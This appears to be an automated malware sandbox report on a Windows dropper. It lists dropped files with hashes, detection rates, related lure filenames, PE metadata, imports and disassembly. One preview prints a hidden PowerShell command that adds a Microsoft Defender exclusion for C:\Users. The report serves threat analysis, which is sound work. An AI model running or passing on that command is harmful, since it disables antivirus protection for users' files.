                                                                                                SHA-512:B8935DC2945B37A05D7867645C26CFE8C3FE30DD31BAB487751F92A97935532913CAEDAB74032E31600B858F20520952E13D9BC6776C9160F9EFC077F0085088
                                                                                                Malicious:false
                                                                                                Preview:94..
                                                                                                Process:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):131648
                                                                                                Entropy (8bit):5.225468064273746
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: SecuriteInfo.com.Win32.DropperX-gen.19020.29434.exe, Detection: malicious
                                                                                                • Filename: e50YC8LCQh.exe, Detection: malicious
                                                                                                • Filename: PURCHASE_ORDER_PRINT_REP_4100067077.doc, Detection: malicious
                                                                                                • Filename: Company_Profile_-_CHUKYO_SL_CO.,_LTD.doc, Detection: malicious
                                                                                                • Filename: ShippingDoc00365483747848466448464PDF.exe, Detection: malicious
                                                                                                • Filename: RFQ_PRICE_QUOTE.PDF.gz.exe, Detection: malicious
                                                                                                • Filename: Quote046567556755678PDF.exe, Detection: malicious
                                                                                                • Filename: uUex2ZIKEm.exe, Detection: malicious
                                                                                                • Filename: 5QjIbz66vr.exe, Detection: malicious
                                                                                                • Filename: DHL_2017128_Documento_de_recibo,pdf.exe, Detection: malicious
                                                                                                • Filename: DHL_Shipping_invoice__621407408,pdf.exe, Detection: malicious
                                                                                                • Filename: SecuriteInfo.com.Win32.DropperX-gen.16131.21279.exe, Detection: malicious
                                                                                                • Filename: TTCOPY.exe, Detection: malicious
                                                                                                • Filename: lppob0Xe3W.exe, Detection: malicious
                                                                                                • Filename: ES20230430221400_6280.PDF.exe, Detection: malicious
                                                                                                • Filename: SIPARI#U015e_NO._1691,pdf.exe, Detection: malicious
                                                                                                • Filename: invoice.exe, Detection: malicious
                                                                                                • Filename: PA2OJuzsRu.exe, Detection: malicious
                                                                                                • Filename: PO-4501226854_WJO-001.xls, Detection: malicious
                                                                                                • Filename: esvkLlXsDw.exe, Detection: malicious
                                                                                                Process:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):175800
                                                                                                Entropy (8bit):6.631791793070417
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                Process:C:\Users\user\Desktop\tTIYCp2sf4.exe
                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):111405
                                                                                                Entropy (8bit):5.052229481631208
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:hljNHW+bID3TTy6Xt8amsy1o865jd5w8DdD05Cl7MbiRHRYQ+b:hJxW+U/N8ago865w8DdD0wRYQ+b
                                                                                                MD5:B23C6ED8594D6B0DBD479CB297F668C7
                                                                                                SHA1:0BB9ABD7A4785838181E33F5D71C1EBA12AD4406
                                                                                                SHA-256:56277178277C1920310C4BD97C523B0EC9D2D4BA09CCF836F4F30E689D79C63F
                                                                                                SHA-512:5129FF81166D37AF2DB18CED8DA600771B20B4DE08A3CDCFD4187371A74E10672524567D3B19B67AB79B318E6A27DBCCB4ACB828210705E652E97D7D8F474D8E
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                                Process:C:\Users\Public\Libraries\flhgywjG.bat
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):944
                                                                                                Entropy (8bit):4.986151217402279
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:tkEIind6UGkMyGWKyMPVGADRPrmai+H0mGdAPORkoao9W7im51w7CSD9pF6RjSa8:qydVauKyM8kzst7266m7RJaC1n
                                                                                                MD5:6841BE6CFDFD4FE3A5681E4CAAFB5F7A
                                                                                                SHA1:2C8FF6F6BC7107EBF75FC4547BCDD0CA9A06ABAF
                                                                                                SHA-256:D352D4A8D640B5F69BEBC41E679296A270FCD36FF4A794D04AEF5A91CE12F691
                                                                                                SHA-512:021FA18C664551342AA562C2C9FAE4C52F03D99E4D0283FDE30D279F262045FF9E4C6450C7EB4509D4F52CDEAD626D55F3B458C5ED3D16464E920AD2312FDD9F
                                                                                                Malicious:false
                                                                                                Preview:{. "geoplugin_request":"102.129.143.30",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Hunenberg",. "geoplugin_region":"Zug",. "geoplugin_regionCode":"ZG",. "geoplugin_regionName":"Zug",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.173",. "geoplugin_longitude":"8.4204",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.8744.}
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1296
                                                                                                Entropy (8bit):5.347046705570045
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:3vJPpQrLAo4KAxX5qRPD42HrCvKLoVZe9tCKnKJRSF8PQiBCn:BPerB4nqRL/HrCvjfe9tC4aR48oMC
                                                                                                MD5:2598489F258E3D65872338E46A8293FB
                                                                                                SHA1:2B0A6F9806D1C9176D4BCA978EB6CC93430115F3
                                                                                                SHA-256:B6313F537C0E93ACEF56BC30F29F291EBF93AFC5837B5E6E04CD19789F3B4BEB
                                                                                                SHA-512:E1CD2BD4978193ABF1B57C814600ABE3A5C1E23817F66C16807400C8364558222E1975C3ABD19701D348018FC0B3E2EEFBFFADA8E64AC6AC609076B06A89F875
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview:1
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview:1
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6205
                                                                                                Entropy (8bit):3.7501482967878643
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:ksD9wS0Cp6qikvhkvCCtOl+H9x1l+H9xr:rD9wW5+Oex1exr
                                                                                                MD5:C6CABEF54283307126C1EA9D041F0C62
                                                                                                SHA1:C81E9476B9B7C537EA7FE344D6A2CAFFAA01D16D
                                                                                                SHA-256:64ADE3C2D763305015A9B6CF776FB8F2278F0F231D67512C9E4BFA006118A792
                                                                                                SHA-512:CBB8D892B80C8BF9DACC07025A1993B3B3EA8A0119DAE80BD7D9DBF929B7D28BC37BE2132AB671B0A2C937973060E87A3C8F2C045B3442BDFD373ECAA273D288
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):6205
                                                                                                Entropy (8bit):3.7501482967878643
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:ksD9wS0Cp6qikvhkvCCtOl+H9x1l+H9xr:rD9wW5+Oex1exr
                                                                                                MD5:C6CABEF54283307126C1EA9D041F0C62
                                                                                                SHA1:C81E9476B9B7C537EA7FE344D6A2CAFFAA01D16D
                                                                                                SHA-256:64ADE3C2D763305015A9B6CF776FB8F2278F0F231D67512C9E4BFA006118A792
                                                                                                SHA-512:CBB8D892B80C8BF9DACC07025A1993B3B3EA8A0119DAE80BD7D9DBF929B7D28BC37BE2132AB671B0A2C937973060E87A3C8F2C045B3442BDFD373ECAA273D288
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):155
                                                                                                Entropy (8bit):4.687076340713226
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                                                                                                MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                                                                                                SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                                                                                                SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                                                                                                SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                                                                                                Malicious:false
                                                                                                Preview:start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):131648
                                                                                                Entropy (8bit):5.225468064273746
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
                                                                                                MD5:231CE1E1D7D98B44371FFFF407D68B59
                                                                                                SHA1:25510D0F6353DBF0C9F72FC880DE7585E34B28FF
                                                                                                SHA-256:30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                                                                                                SHA-512:520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):111405
                                                                                                Entropy (8bit):5.052229481631208
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:hljNHW+bID3TTy6Xt8amsy1o865jd5w8DdD05Cl7MbiRHRYQ+b:hJxW+U/N8ago865w8DdD0wRYQ+b
                                                                                                MD5:B23C6ED8594D6B0DBD479CB297F668C7
                                                                                                SHA1:0BB9ABD7A4785838181E33F5D71C1EBA12AD4406
                                                                                                SHA-256:56277178277C1920310C4BD97C523B0EC9D2D4BA09CCF836F4F30E689D79C63F
                                                                                                SHA-512:5129FF81166D37AF2DB18CED8DA600771B20B4DE08A3CDCFD4187371A74E10672524567D3B19B67AB79B318E6A27DBCCB4ACB828210705E652E97D7D8F474D8E
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...].d.P..v.....& ..........................<a............................. .......3........ .................................................P............P..................\........................... ...(.......................X............................................................... .P`........P....0....... ..............@.P..............@......."..............@.P@.............P.......(..............@.0@.............`.......,..............@.0@.............p........................p.....................................@.0@........P............0..............@.0.........X............8..............@.@.........h............:..............@.`.........\............<..............@.0B/4...................>..............@.PB/19..................B..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
                                                                                                Process:C:\Windows\SysWOW64\PING.EXE
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):527
                                                                                                Entropy (8bit):4.93002924277763
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:PKMRJpTeTeTeTeTeT0sF7n+AFSkIrxMVlmJHaVzvv:/naD+AokItULVDv
                                                                                                MD5:1E4493508EB6B3891A6134F6719B8CFF
                                                                                                SHA1:5945034284D72C4F0513510A51F5667D2D14E65F
                                                                                                SHA-256:5153D49A8705C8621F4DAA72287BE931D2D34346E4984EFB4B572CEDD95DA4AC
                                                                                                SHA-512:5BF0B241EA0136A901EA0AA15D194ECA23B83C4C7586278097E20443A8D775F250FED7614CFDA37CB7171CE73512C4855E924E4AE35BE16150DDEC9AB8FC9649
                                                                                                Malicious:false
                                                                                                Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 6, Received = 6, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Entropy (8bit):7.278512693308651
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                File name:tTIYCp2sf4.exe
                                                                                                File size:1'113'600 bytes
                                                                                                MD5:ae5ad2efd8a9cf25ad9eb00ebe24eb92
                                                                                                SHA1:2eee8f21d06a2602ed0cd3e5dc3a8a0dea8157d1
                                                                                                SHA256:cf39a14a2dc1fe5aa487b6faf19c63bc97103db670fa24c62832895e3002eca2
                                                                                                SHA512:983e6138ea90d1aad8963e4441218e644b4829336561d5c40e5afdadc869ffd9ccf9434260bde1ef3858e8d73616945e01e5306eb8a1023772cafbf4066dd830
                                                                                                SSDEEP:24576:+GBEKQCWCWF4bH7yT+YLWPP7/NCo6LboxSYVuDpa7Dfavrjnpi0JN:rDpd7/NC3LRYwNa7mvrjJ
                                                                                                TLSH:4E35CF27A3E50573F127363548A7B279DCAD7D2428293C816BE63E88BE376417F081D6
                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                Icon Hash:bdb1724676725259
                                                                                                Entrypoint:0x476bc4
                                                                                                Entrypoint Section:.itext
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                DLL Characteristics:
                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:051f371797f6e597d48d110e8ed68eca
                                                                                                Instruction
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                add esp, FFFFFFF0h
                                                                                                mov eax, 00472FC8h
                                                                                                call 00007F67BCDDBFA1h
                                                                                                mov eax, dword ptr [004FDDECh]
                                                                                                mov eax, dword ptr [eax]
                                                                                                call 00007F67BCE2EDB5h
                                                                                                mov ecx, dword ptr [004FDED0h]
                                                                                                mov eax, dword ptr [004FDDECh]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov edx, dword ptr [00472D08h]
                                                                                                call 00007F67BCE2EDB5h
                                                                                                mov eax, dword ptr [004FDDECh]
                                                                                                mov eax, dword ptr [eax]
                                                                                                call 00007F67BCE2EE29h
                                                                                                call 00007F67BCDD9D44h
                                                                                                lea eax, dword ptr [eax+00h]
                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x102000 | 0x2b60 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10f000 | 0x9a00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x107000 | 0x7128 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x106000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10288c | 0x6ac | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x721b8 | 0x72200 | False | 0.5304392285049289 | data | 6.574825635312279 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x74000 | 0x2c0c | 0x2e00 | False | 0.36506453804347827 | data | 5.400860673873409 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x77000 | 0x86f8c | 0x87000 | False | 0.5968786168981481 | data | 7.295360828948748 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xfe000 | 0x369c | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x102000 | 0x2b60 | 0x2c00 | False | 0.3210227272727273 | data | 5.090640426780868 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x105000 | 0x34 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x106000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.20134432838821048 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x107000 | 0x7128 | 0x7200 | False | 0.656969572368421 | data | 6.699141454471892 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x10f000 | 0x9a00 | 0x9a00 | False | 0.37203226461038963 | data | 5.070700304000019 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x10f734 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x10f868 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x10f99c | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x10fad0 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x10fc04 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x10fd38 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x10fe6c | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_ICON | 0x10ffa0 | 0x3a48 | Device independent bitmap graphic, 60 x 120 x 32, image size 14880 | | | 0.03646112600536193
RT_STRING | 0x1139e8 | 0x244 | AmigaOS bitmap font "P", fc_YSize 28672, 18944 elements, 2nd "t", 3rd "w" | | | 0.47586206896551725
RT_STRING | 0x113c2c | 0x384 | data | | | 0.42777777777777776
RT_STRING | 0x113fb0 | 0xb8 | data | | | 0.6793478260869565
RT_STRING | 0x114068 | 0xf8 | data | | | 0.6290322580645161
RT_STRING | 0x114160 | 0x400 | data | | | 0.4013671875
RT_STRING | 0x114560 | 0x3a4 | data | | | 0.38197424892703863
RT_STRING | 0x114904 | 0x370 | data | | | 0.4022727272727273
RT_STRING | 0x114c74 | 0x3cc | data | | | 0.33539094650205764
RT_STRING | 0x115040 | 0x214 | data | | | 0.49624060150375937
RT_STRING | 0x115254 | 0xcc | data | | | 0.6274509803921569
RT_STRING | 0x115320 | 0x194 | data | | | 0.5643564356435643
RT_STRING | 0x1154b4 | 0x3c4 | data | | | 0.3288381742738589
RT_STRING | 0x115878 | 0x338 | data | | | 0.42961165048543687
RT_STRING | 0x115bb0 | 0x294 | data | | | 0.42424242424242425
RT_RCDATA | 0x115e44 | 0x10 | data | | | 1.5
RT_RCDATA | 0x115e54 | 0x27c | data | | | 0.7374213836477987
RT_RCDATA | 0x1160d0 | 0x26e9 | Delphi compiled form 'TForm_ouvrir_l_imprimante' | | | 0.9308302379279189
RT_GROUP_CURSOR | 0x1187bc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x1187d0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x1187e4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x1187f8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x11880c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x118820 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x118834 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x118848 | 0x14 | data | | | 1.25
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
